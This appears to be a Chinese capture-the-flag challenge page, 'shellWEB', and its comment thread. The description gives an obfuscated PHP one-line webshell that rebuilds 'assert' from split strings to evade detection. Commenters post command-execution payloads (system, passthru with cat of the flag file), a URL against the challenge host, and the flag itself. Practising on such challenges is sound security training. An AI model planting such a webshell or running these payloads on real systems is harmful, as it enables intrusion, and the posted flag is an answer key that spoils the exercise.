shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 6515
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
淮南 1年前

环境打不开 退钱!!!

回复 0
whois 1年前

啊哈?

回复 0

淮南 1年前

环境有问题

回复 0

小白菜. 1年前

后悔做之前没看评论区,rnm,退钱

回复 0

falg 1年前

就是一般的命令执行,先拿到index.php然后后面?s=system("ls")查看flaga15808abee46a1d5.txt文件,接着?s=system("cat ./flaga15808abee46a1d5.txt")得到flag

回复 1

bt7274 2年前

assert($_GET['s'])

回复 0

04secbug 2年前

s=system('ls') s=system('cat flag')

回复 1

JJhello 2年前

rnm,退钱

回复 2

wxy1343 2年前

flag{5104494e7b5ec21c02e3d1c5985a4e89}

回复 0

wxy1343 2年前

http://114.67.175.224:11167/index.php?s=passthru(%27cat%20flaga15808abee46a1d5.txt%27)

回复 0

我爱你制杖 2年前

注意描述,explode为分搁符。绕来绕去就是:assert($_GET['s'])

回复 1

WriteUp

image
harry

3 金币

评分(9)

解题动态

szb123 攻破了该题 1小时前
17361232956 攻破了该题 2小时前
皮蛋瘦肉粥 攻破了该题 2小时前
aaa1 攻破了该题 3小时前
初入CTF联盟 攻破了该题 5小时前
hahahahahahaha 攻破了该题 6小时前
GEcharacter 攻破了该题 6小时前
wujiayi 攻破了该题 10小时前
huangfeiyu 攻破了该题 11小时前
晚霞难掩秋色 攻破了该题 11小时前
Julia 攻破了该题 21小时前
hanzkj 攻破了该题 1天前
920917544 攻破了该题 1天前
codegod 攻破了该题 1天前
foxkiller 攻破了该题 1天前
desireart 攻破了该题 1天前
Ywctf 攻破了该题 1天前
orange2015 攻破了该题 1天前
刚哥glory 攻破了该题 1天前
2757547892 攻破了该题 1天前
问题反馈